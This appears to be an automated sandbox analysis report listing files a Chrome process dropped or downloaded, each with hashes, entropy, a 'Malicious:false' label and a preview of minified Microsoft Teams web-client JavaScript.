                                                                                                                                                                                                                          Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[945920],{145916:(t,e,i)=>{const r=i(710639),a=i(367323),{isPlainObject:n}=i(698286),s=i(944244),o=i(391318),{parse:l}=i(589059),d=["img","audio","video","picture","svg","object","map","iframe","embed"],c=["script","style"];function u(t,e){t&&Object.keys(t).forEach((function(i){e(t[i],i)}))}function f(t,e){return{}.hasOwnProperty.call(t,e)}function m(t,e){const i=[];return u(t,(function(t){e(t)&&i.push(t)})),i}t.exports=g,t.exports.default=g,Object.defineProperty(t.exports,"__esModule",{value:!0});const h=/^[^\0\t\n\f\r /<=>]+$/;function g(t,e,i){if(null==t)return"";let b="",w="";function y(t,e){const i=this;this.tag=t,this.attribs=e||{},this.tagPosition=b.length,this.text="",this.mediaChildren=[],this.updateParentNodeText=function(){if(H.length){H[H.length-1].text+=i.text}},this.updateParentNodeMediaChildren=function(){if(H.length&&d.includes(this.tag)){H[H.length-1].mediaChildren.push(th
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (20588)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):20703
                                                                                                                                                                                                                          Entropy (8bit):5.264666815172731
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:xwzYpLlQ4N/aTLwZ8qgA604dlBoI8WcHFufkE+9zWP9+Gv0Y6XoDidUhs8L5skLx:CUVlQ4N/a3wZ8LA604bBoI8vcfN+9yPp
                                                                                                                                                                                                                          MD5:69ECA731C1AAF4A9525E88C0A4F50F9D
                                                                                                                                                                                                                          SHA1:B19B3D104E0BA17A8C9DB9804E68AA1E12583DA8
                                                                                                                                                                                                                          SHA-256:5D6F5EFCC03C21420B1E057DA2C8F1307E88C17BA419DEB68CAC0C639208F031
                                                                                                                                                                                                                          SHA-512:C1663BF699B799D65A419C99101CE4324B68F5FE103BE28F6CDD312D0AC5A65DC6F668423B2C227D9B49075AD63B96897E6D39AC847CD484258334EF159BCA98
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[945920],{145916:(t,e,i)=>{const r=i(710639),a=i(367323),{isPlainObject:n}=i(698286),s=i(944244),o=i(391318),{parse:l}=i(589059),d=["img","audio","video","picture","svg","object","map","iframe","embed"],c=["script","style"];function u(t,e){t&&Object.keys(t).forEach((function(i){e(t[i],i)}))}function f(t,e){return{}.hasOwnProperty.call(t,e)}function m(t,e){const i=[];return u(t,(function(t){e(t)&&i.push(t)})),i}t.exports=g,t.exports.default=g,Object.defineProperty(t.exports,"__esModule",{value:!0});const h=/^[^\0\t\n\f\r /<=>]+$/;function g(t,e,i){if(null==t)return"";let b="",w="";function y(t,e){const i=this;this.tag=t,this.attribs=e||{},this.tagPosition=b.length,this.text="",this.mediaChildren=[],this.updateParentNodeText=function(){if(H.length){H[H.length-1].text+=i.text}},this.updateParentNodeMediaChildren=function(){if(H.length&&d.includes(this.tag)){H[H.length-1].mediaChildren.push(th
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (2740)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):2868
                                                                                                                                                                                                                          Entropy (8bit):5.3902771129703595
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:48:wp3sp3oixAQmUUyXeECVdTeCVd1goWlailPvxw4svkew1hj1hDhP3haHbeNCBkGy:lFUyOV3vZg8ilPe4s8eq7NZ0HSgkGsIk
                                                                                                                                                                                                                          MD5:31616D909F22DE626E97886039B11BE7
                                                                                                                                                                                                                          SHA1:6F02320366C4BEDB38CD23FB573E1E256EACF1E4
                                                                                                                                                                                                                          SHA-256:32FFDBD5047D20AB0F860EDD0337F92A00D990785892670A39E14A746F7D0A9D
                                                                                                                                                                                                                          SHA-512:57134A8AC5C560C420B4D9D3FB0EE842F924C22DEC0E34F5C62DC0A687973979F85C08B09F763325B7B31AB978EF3D5597ED303D6510F3401E780EA233D8AC61
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[439411],{634305:(e,t,r)=>{r.r(t),r.d(t,{SHAREPOINT_SCENARIO_HEADER_FOR_THUMBNAIL_API_PREFIX:()=>R.e,SharePointPreferHeaders:()=>R.Y2,SharepointRestClient:()=>y,SharepointScenario:()=>R.eu,SharepointScenarioType:()=>R.CK,SharepointSharingMode:()=>R.vV,createSimpleRequest:()=>S.K,simpleRequestSender:()=>S.X});var s=r(116259),n=r(90744),a=r(539299),o=r(262775),i=r(364819),c=r(332752),u=r(805809),p=r(424096);const h=(e,t)=>({...e,serviceName:u.p.Sharepoint,headers:t}),d=({authenticationResources:e})=>{const t=$,r=(0,p.e)(t,{});return{serviceName:u.p.Sharepoint,authResource:e.authorizeByUrl,models:{rawRequest:r(h).withTransform(m)}}};function $(e){return Promise.resolve({constructRequest:e,rejectHttpError:!0})}const m=async e=>e,_=(e,t)=>({rawRequest:l(e,t)}),l=(e,t)=>async(r,s)=>{const n=h(r,s);return e(n,t)};class y{constructor(e,t,r,o){this._aad=e,this._clientType=t.config.clie
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (41662)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):41778
                                                                                                                                                                                                                          Entropy (8bit):5.360363617158387
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:gpYFYfTpWdL/In2MB1TU6EIQRNrPzaNfrfAxETtp27EFF9V9LfiTXIDLJqoGBwr:gpkYfId4D0ExYoFfiTXkFq7a
                                                                                                                                                                                                                          MD5:38B448E73F0207EDB8A49DA72943D515
                                                                                                                                                                                                                          SHA1:4B761C3BD552A524946DDEBEF41D392E4606EC14
                                                                                                                                                                                                                          SHA-256:019D358A1E21F5B6F1FDE5482EEEF12051D85E374A48A35559108FC1FD3920F1
                                                                                                                                                                                                                          SHA-512:2F5F3245B57FCAFC06A3CA95D068A60A28A94861A821B3E1DADC3EA6D3C134F0B6BF472B27683D01F66DB53BB921C3D6D318029D3865CC7E74808E254D028D2C
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[204348],{941974:t=>{t.exports=function(t,e){if(!(t instanceof e))throw new TypeError("Cannot call a class as a function")},t.exports.__esModule=!0,t.exports.default=t.exports},749712:t=>{function e(t,e){for(var i=0;i<e.length;i++){var n=e[i];n.enumerable=n.enumerable||!1,n.configurable=!0,"value"in n&&(n.writable=!0),Object.defineProperty(t,n.key,n)}}t.exports=function(t,i,n){return i&&e(t.prototype,i),n&&e(t,n),Object.defineProperty(t,"prototype",{writable:!1}),t},t.exports.__esModule=!0,t.exports.default=t.exports},238752:t=>{t.exports=function(t,e,i){return e in t?Object.defineProperty(t,e,{value:i,enumerable:!0,configurable:!0,writable:!0}):t[e]=i,t},t.exports.__esModule=!0,t.exports.default=t.exports},434192:(t,e,i)=>{var n=i(71012);t.exports=function(t,e){if(null==t)return{};var i,r,o=n(t,e);if(Object.getOwnPropertySymbols){var s=Object.getOwnPropertySymbols(t);for(r=0;r<s.length;r+
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):3895900
                                                                                                                                                                                                                          Entropy (8bit):5.39232794493168
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:49152:GhoKeEA9gApAiHarj7wgx1k4pwFe0w4F2juOdHIYu5XTJUwguj1iTmFAnhKc7tkW:kFeG
                                                                                                                                                                                                                          MD5:39F0C9B578D2A20F9B62E5DF5A224332
                                                                                                                                                                                                                          SHA1:5BCD8E1E0B7D7259BB0FECC2228E2318DCA99AC5
                                                                                                                                                                                                                          SHA-256:96E8E1CDB27ACAD1F09E2F105B2BBA6ED711417599F8622754F3BC28D49B389E
                                                                                                                                                                                                                          SHA-512:DED6A03B3378269B7E4A2AF980CA7F5DE4E403721570EF3A975EB82CCFE5E3A98716A2F6AF0702F1490816A5D2FF94B6AED4ACAB0F0DEC87F1499D1858BF1F44
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/async-entry-8a5088adbb16698b.js
                                                                                                                                                                                                                          Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[805610],{211014:(e,t,n)=>{"use strict";n.d(t,{b:()=>i});const i=(0,n(965804).O)({isStudentAvatar:{Bf4jedk:"f1ohpo60"},isParentAvatar:{Bf4jedk:"ff9fk16"}})},516404:(e,t,n)=>{"use strict";function i(e){return'<link\n rel="shortcut icon"\n type="image/x-icon"\n id="teams-favicon"\n href="[[staticsPath]]/evergreen-assets/icons/microsoft_teams_logo_refresh.ico"\n/>','<link\n rel="shortcut icon"\n type="image/x-icon"\n id="teams-favicon"\n href="[[staticsPath]]/evergreen-assets/icons/microsoft_teams_logo_refresh.ico"\n/>'}n.d(t,{A:()=>i})},10247:(e,t,n)=>{"use strict";function i(e){var t="";Array.prototype.join;return t+="<style>\n .preload-title-bar-trim {\n ","mac"===e.osPlatform?t+="\n --preload-title-bar-background-color: rgb(98, 100, 167);\n ":t+="\n --preload-title-bar-background-color: rgb(70, 71, 117);\n ",t+='\n\n background-color: var(--preload-title-bar-bac
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (9167)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):9275
                                                                                                                                                                                                                          Entropy (8bit):4.510710251595788
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:192:DAi0z2jGpS76h5H2VtCdYkVQTWh3+cjTnQ03SiVtB9jJj:N0z2jGpSq5H2VtCdYnlc/HSiVtvF
                                                                                                                                                                                                                          MD5:2EB77E310EAEE79E0D7C1355B3BEFF5B
                                                                                                                                                                                                                          SHA1:8B3A438962114E5815D13018AAA04000BA6EE69F
                                                                                                                                                                                                                          SHA-256:957483AE90B62F6E44072EB51C20E693A5B6B57CC34D763AFA3EB42A658B9DFD
                                                                                                                                                                                                                          SHA-512:98F3F4ADCA9FA49812B538747644A105C1AC1DFCF9FFD120BB7B5772FC6F0917B4FCD87C76FBFC8289DABE77385A62CD5E3F0B0E2E9902BD35E0F8DE163C72A9
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[698386],{698386:(a,l,Z)=>{Z.d(l,{aRN:()=>c,c8N:()=>v,WXH:()=>h,g0L:()=>H,NL$:()=>e,vrP:()=>m,vNW:()=>A,fEx:()=>V,faZ:()=>L,$8m:()=>i,N6m:()=>U,gMM:()=>o,k8t:()=>r,uJg:()=>u,lnn:()=>n,dAI:()=>g,Tv4:()=>t,$b4:()=>R,lDF:()=>d,OEH:()=>k,uwA:()=>s,CSI:()=>I,iCA:()=>C,IJL:()=>F,GOF:()=>f,ozV:()=>p});var M=Z(693935);const c=(0,M.U)("Info12Filled","12",["M11 6A5 5 0 1 1 1 6a5 5 0 0 1 10 0Zm-5.5.5V8a.5.5 0 0 0 1 0V6.5a.5.5 0 0 0-1 0ZM6 3.75a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Z"]),v=(0,M.U)("Info12Regular","12",["M5.5 6.5a.5.5 0 0 1 1 0V8a.5.5 0 0 1-1 0V6.5ZM6 3.75a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5ZM1 6a5 5 0 1 1 10 0A5 5 0 0 1 1 6Zm5-4a4 4 0 1 0 0 8 4 4 0 0 0 0-8Z"]),h=(0,M.U)("Info16Filled","16",["M8 1a7 7 0 1 1 0 14A7 7 0 0 1 8 1Zm0 5.25a.75.75 0 1 0 0-1.5.75.75 0 0 0 0 1.5Zm.5 1.25a.5.5 0 0 0-1 0v3a.5.5 0 0 0 1 0v-3Z"]),H=(0,M.U)("Info16Regular","16",["M8.5 7.5a.5.5 0 1 0-1 0v3
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (28291)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):28399
                                                                                                                                                                                                                          Entropy (8bit):5.326616207965685
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:MyYDkxf+bxQsDP+pxvWxgGUFk+DUazTmKHgdt6JDBbVLo8/g6hCpocPoQDc1:fEk0p+pYxgcm5/g68GcPo
                                                                                                                                                                                                                          MD5:8C1C0AFCA40BE8D07416F3805585624B
                                                                                                                                                                                                                          SHA1:27C48E1BB6618B9046EEEDF5D98763FA42F0E371
                                                                                                                                                                                                                          SHA-256:F614C28E24FF941A79923399511189CEDD7CA01CA9F460C506D6CD8D64DB7BE9
                                                                                                                                                                                                                          SHA-512:DC2F6C45726EF7349650FCC01E954EFD018F05614FF4454040A96AE41D3AC421DEB49E45B5F88246E3543D9FDBAAC7BC3138A229287228AECD9812C778C1C459
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[209929],{598166:(t,e,n)=>{"use strict";function r(t){return t.split("-")[1]}function i(t){return"y"===t?"height":"width"}function o(t){return t.split("-")[0]}function a(t){return["top","bottom"].includes(o(t))?"x":"y"}function s(t,e,n){let{reference:s,floating:l}=t;const c=s.x+s.width/2-l.width/2,f=s.y+s.height/2-l.height/2,u=a(e),d=i(u),p=s[d]/2-l[d]/2,h="x"===u;let g;switch(o(e)){case"top":g={x:c,y:s.y-l.height};break;case"bottom":g={x:c,y:s.y+s.height};break;case"right":g={x:s.x+s.width,y:f};break;case"left":g={x:s.x-l.width,y:f};break;default:g={x:s.x,y:s.y}}switch(r(e)){case"start":g[u]-=p*(n&&h?-1:1);break;case"end":g[u]+=p*(n&&h?-1:1)}return g}n.d(e,{UE:()=>g,rD:()=>l,__:()=>u,UU:()=>b,jD:()=>I,ER:()=>L,cY:()=>k,B1:()=>f,BN:()=>E,Ej:()=>B});const l=async(t,e,n)=>{const{placement:r="bottom",strategy:i="absolute",middleware:o=[],platform:a}=n,l=o.filter(Boolean),c=await(null==a.isRTL
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (14946)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):15054
                                                                                                                                                                                                                          Entropy (8bit):5.152646782756875
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:192:soyB0m0WM9ymIOoNopcFBsVJbt6Bj4j5V2fMgweKxbAYUNmcz:ByB0VW9mIVipcvQDxEYUNF
                                                                                                                                                                                                                          MD5:AB668D7FD64D6D724AACC13835600172
                                                                                                                                                                                                                          SHA1:270F06034E2A78879F7266A6C0EEE7B0E3C9C638
                                                                                                                                                                                                                          SHA-256:3640B1F9D4CE4975E2F7E4DE3FFA59BD73829A83258DC18DC0125B1DF281742F
                                                                                                                                                                                                                          SHA-512:44B975C509BB412FBA65E54E9B346C09E4454E8986480DD28FAD992D8197801F64B30C625F6166AD2EB0C9E59FA89DA2BF30B1C7B6177DCBD8BC44449F880432
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/425104-7f05ec4bfb91b2a4.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[425104],{425104:(e,t,n)=>{n.d(t,{Zb:()=>F,Ag:()=>G,kD:()=>w,lg:()=>_,CK:()=>O});const i=Object.entries||function(e){return Object.keys(e).map((function(t){return[t,e[t]]}))};var s=n(305573),o=n(615582);function r(e,t){for(var n=Object.create(null),s=0,o=i(e);s<o.length;s++){var r=o[s],a=r[0],u=r[1];n[a]=t(u,a)}return n}function a(e){if(null===Object.getPrototypeOf(e))return e;for(var t=Object.create(null),n=0,s=i(e);n<s.length;n++){var o=s[n],r=o[0],a=o[1];t[r]=a}return t}var u=n(241921),c=n(625482),f=n(855752),p=5;var d=n(689054);function l(e){return e}var h=n(743357);var v=function(){function e(e){this._input=e,this._inputLowerCase=e.toLowerCase(),this._inputArray=y(this._inputLowerCase),this._rows=[new Array(e.length+1).fill(0),new Array(e.length+1).fill(0),new Array(e.length+1).fill(0)]}return e.prototype.measure=function(e,t){if(this._input===e)return 0;var n=e.toLowerCa
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (14104)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):14212
                                                                                                                                                                                                                          Entropy (8bit):4.793888724643343
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:192:jjqz7w2M3hbxUTViE/G5qVQY61phMH3LDZiGhRpldoWOhq0QEQSTf9+P:j2AXhVUTViE/G5qVQYkpaBT/on8bSL9g
                                                                                                                                                                                                                          MD5:C779A3CD7F261EFEA6776C15C84F5548
                                                                                                                                                                                                                          SHA1:C330D22070332B3DAB44F90167FA26F32D5F56CF
                                                                                                                                                                                                                          SHA-256:39B145AA7B80DB2B82502A5237A71CE7AD23F6A24F316819765CF6CAE41C4F97
                                                                                                                                                                                                                          SHA-512:F9D89DBFBB56766357ED4374490AD7901022E54B9444376C492B38CA288824A5DD2273D38B01F12C7C8809E1C1F02E7F671888A674F761FF0668FFDEE038DC53
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[725591],{852774:(a,e,l)=>{l.d(e,{MHj:()=>c,nDI:()=>M,Vjr:()=>r,Fm4:()=>n,S61:()=>A,SH1:()=>s,W5L:()=>u,jz7:()=>t,lwq:()=>U,V$h:()=>i,qvE:()=>P,qXC:()=>L,_E3:()=>h,uO1:()=>v,yQ7:()=>m,gNt:()=>d,Vo$:()=>g,HkI:()=>R,jcT:()=>o,TTi:()=>f,NUA:()=>V,fGI:()=>H,B2S:()=>F,Ndk:()=>y,grK:()=>w,qSk:()=>b,DWd:()=>k,Z4e:()=>O,TNE:()=>C,mx_:()=>D,U$D:()=>S,gC_:()=>_,ORW:()=>B,vsS:()=>$,F$H:()=>p,xmy:()=>q,hmO:()=>x,X8c:()=>E,fPq:()=>I,dR_:()=>j,MxQ:()=>N,KCz:()=>Q,y3Y:()=>T,gNc:()=>z,uOK:()=>G,X0b:()=>K,PM$:()=>W,nPn:()=>X,lYg:()=>Y,omG:()=>J,xo$:()=>aa,$Oq:()=>ea,b8q:()=>la,ADj:()=>Za,tOz:()=>ca,Vvl:()=>Ma,w8$:()=>ra,$xG:()=>na,Uhh:()=>Aa,It2:()=>sa});var Z=l(693935);const c=(0,Z.U)("PersonVoice20Regular","20",["M17.13 1.06a.5.5 0 0 1 .68.2 9.96 9.96 0 0 1 0 9.48.5.5 0 1 1-.88-.48 8.96 8.96 0 0 0 0-8.52.5.5 0 0 1 .2-.68Zm-2.32 1.97a.5.5 0 0 1 .65.27 6.98 6.98 0 0 1 0 5.4.5.5 0 1 1-.92-.39 5
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):324
                                                                                                                                                                                                                          Entropy (8bit):5.376083689062415
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:6:FSPl39b4BSyRbjGJlI9kXJ3+V0q1EkmGHr9EJiKWaEt39J:cd39MBSyVz0XkTHr+pWTt39J
                                                                                                                                                                                                                          MD5:ACD4F2B6117E5054FC9BF848AE8121CA
                                                                                                                                                                                                                          SHA1:AE4D5F41D854BA8D99A4A1EC6EE6D6C3C0A859B8
                                                                                                                                                                                                                          SHA-256:66774F89FCFA5674BE9AEF60E3FE3CB81E4DD88246BDE4E5392DF8B99FEFD4DB
                                                                                                                                                                                                                          SHA-512:906FC9144D4AB81E8000CBE4A7AF7AFF775464347449193337E8738D705888C02B9476E083B3B67BDB3CBC312AAC4644C10737BC1FC5F9F08B38F5F45A2410F9
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:define("@widget/LAYOUT/c/bs-legacyOverrides-42582241.js",["exports"],(function(e){"use strict";e.g=function(e,i,n){let o={};return"MENU"===i&&"h3"===e&&(o={color:"highlight"},"menu3"===n&&(o.fontSize="large")),o}})),"undefined"!=typeof window&&(window.global=window);.//# sourceMappingURL=bs-legacyOverrides-42582241.js.map.
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):73389
                                                                                                                                                                                                                          Entropy (8bit):5.302603730388669
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:1536:prYXUP+dcYtaNHGuq+WMcjETBn+UfZ3EQ00LqEIiE66+Hdv8//iHJ4RcWX:hYXU2GZx5yKnDLKAE7RcI
                                                                                                                                                                                                                          MD5:B1363ACAF4176F1D3ADA9B2485B9318E
                                                                                                                                                                                                                          SHA1:4C1A23CEC7DB2F3BF30B8E6AC0EB0BEEEA5C130F
                                                                                                                                                                                                                          SHA-256:F0422E5E5F85C63C20756D6799C092BEF007D15B4E28F98CF8D30F00C74BA40E
                                                                                                                                                                                                                          SHA-512:2E4D1EA792F5DB1ECC4954B2B054A32722704448D1638567063ACB5BFC21A4AEDDF7B069392B97DDF385F005E1D8921CA5F745E62E163FCEA49A3444EA278F55
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[492696],{589708:(e,t,a)=>{a.d(t,{j:()=>$});var r=a(802756),i=a(60214),o=a(625292),n=a(923226),s=a(848020),c=a(448211),d=a(510139),u=a(935008),l=a(366603),h=a(48410),g=a(191914),_=a(955262),m=a(417694),p=a(847431),S=a(703478);const A=(e,t)=>(0,l.$5)({context:"Authentication",subContext:"loadAuthProvider",errorCode:p.tG.AuthProviderLoadError,isExpected:!1,message:(0,d.Nw)(e),correlationId:t}),v=(e,t,a,r)=>{if(r?.("enablePostMessageAuthentication")&&t.hasPostMessageAgent){const t=e.postMessageConfig;if(!t)throw(0,l.$5)({context:"Authentication",subContext:"loadAuthProvider",errorCode:p.tG.AuthProviderLoadError,isExpected:!1,message:"When enabling post message based authentication, postMessageConfig must be provided in the experience configuration.",correlationId:a});if(0===t.length)throw(0,l.$5)({context:"Authentication",subContext:"loadAuthProvider",errorCode:p.tG.AuthProviderL
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1846)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1954
                                                                                                                                                                                                                          Entropy (8bit):5.235922559299956
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:48:wp3sp3ajYEjENkjuX8Vv30IaCUcYtZsjhasXls2OvGpYsHHfWs3lJF2t7AsQksbR:4jYEjENkjuXgvESUDXUaklcsYOesj2t8
                                                                                                                                                                                                                          MD5:1D699FA4A71C9B7AF307FD055FD60673
                                                                                                                                                                                                                          SHA1:17881139B9A85CB04CE94F7D69FDB3A146A075F2
                                                                                                                                                                                                                          SHA-256:4DA7BFBBFBE1C5B2A2AD8E4B71D35054943BEE0810045738DB645D2F99CE66FF
                                                                                                                                                                                                                          SHA-512:7D9AEB65B5FE25560BD2E14C4BDCAED9D63C1563E459528A0C1964B66E59688B1A3A358368B44172C3DE97134B9F008D60B6BC922C1DB0586ADC45DBD034BD97
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[829271,51652],{829271:(e,t,o)=>{o.r(t),o.d(t,{AnnounceProvider:()=>M,AnnounceProvider_unstable:()=>M,BackgroundAppearanceProvider:()=>w,CustomStyleHooksContext_unstable:()=>k,CustomStyleHooksProvider_unstable:()=>y,OverridesProvider_unstable:()=>p,PortalMountNodeProvider:()=>H,Provider_unstable:()=>P,ThemeClassNameProvider_unstable:()=>a,ThemeContext_unstable:()=>r,ThemeProvider_unstable:()=>u,TooltipVisibilityProvider_unstable:()=>c,useAnnounce:()=>O,useAnnounce_unstable:()=>O,useBackgroundAppearance:()=>N,useCustomStyleHook_unstable:()=>A,useFluent_unstable:()=>x,useOverrides_unstable:()=>h,usePortalMountNode:()=>S,useThemeClassName_unstable:()=>d,useTooltipVisibility_unstable:()=>C});var n=o(513432);const r=n.createContext(void 0),u=r.Provider,i=n.createContext(void 0),s="",a=i.Provider;function d(){var e;return null!==(e=n.useContext(i))&&void 0!==e?e:s}const v=n.createCo
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (9937)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):10044
                                                                                                                                                                                                                          Entropy (8bit):5.444279096330454
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:192:1QgZfOfW6LKNLIDepX+gQ8LOapl1KzL16tnpA8Ckh9Hd+4keq4PBH4UGNfRoLyL8:tGrGhISpX+g3Bv4apvCkjdjDq4J471RM
                                                                                                                                                                                                                          MD5:2B4C497D3F89CB23052BE40DA7B4FD82
                                                                                                                                                                                                                          SHA1:D55BEF6FB11CBB81BD08144BA1A61DD2EBFEB5E6
                                                                                                                                                                                                                          SHA-256:2DCCF9898681979FAB08FE15530549519F86519818E9154BFB74D4CC6F98B46E
                                                                                                                                                                                                                          SHA-512:06960A5C1F31359E13B29A988751A60C928D8CE2AC854B5B0F36B220EF49B449E27B17D1AE4835F8A47CB8ED9EA8C0DB86C5F67B7C304A62B3FB32B2404F2A7F
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/57627-ce7087dcecb2b6d1.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[57627],{184027:(e,t,r)=>{r.d(t,{q:()=>o});var n=r(513432),a=r(691505),o=function(e){var t,r=n.createContext({value:{current:e},version:{current:-1},listeners:[]});return r.Provider=(t=r.Provider,function(e){var r=n.useRef(e.value),o=n.useRef(0),s=n.useRef();return s.current||(s.current={value:r,version:o,listeners:[]}),(0,a.E)((function(){r.current=e.value,o.current+=1,(0,a.H)((function(){s.current.listeners.forEach((function(t){t([o.current,e.value])}))}))}),[e.value]),n.createElement(t,{value:s.current},e.children)}),delete r.Consumer,r}},963300:(e,t,r)=>{r.d(t,{F:()=>s});var n=r(513432),a=r(691505),o=r(783943);const s=(e,t)=>{const r=n.useContext(e),{value:{current:s},version:{current:c},listeners:l}=r,i={};Object.keys(t).forEach((e=>{i[e]=t[e](s)}));const[u,d]=n.useState([s,i]),m=e=>{d((r=>{if(!e)return[s,i];if(e[0]<=c){return Object.keys(t).every((e=>Object.is(r[1][e],i[
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (36879)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):36987
                                                                                                                                                                                                                          Entropy (8bit):5.379410624740036
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:yRWn0S3+zdj+ZSt/oz3lhNBbSCeMcxNDTHmwHQoUeYVu:ygnr+AU/ozTNBbSC9eN
                                                                                                                                                                                                                          MD5:EABD9EE763EBBE8CC6821242AD8968B7
                                                                                                                                                                                                                          SHA1:B70611C7EDBC1D933213EA7BF9A84A957F797CB4
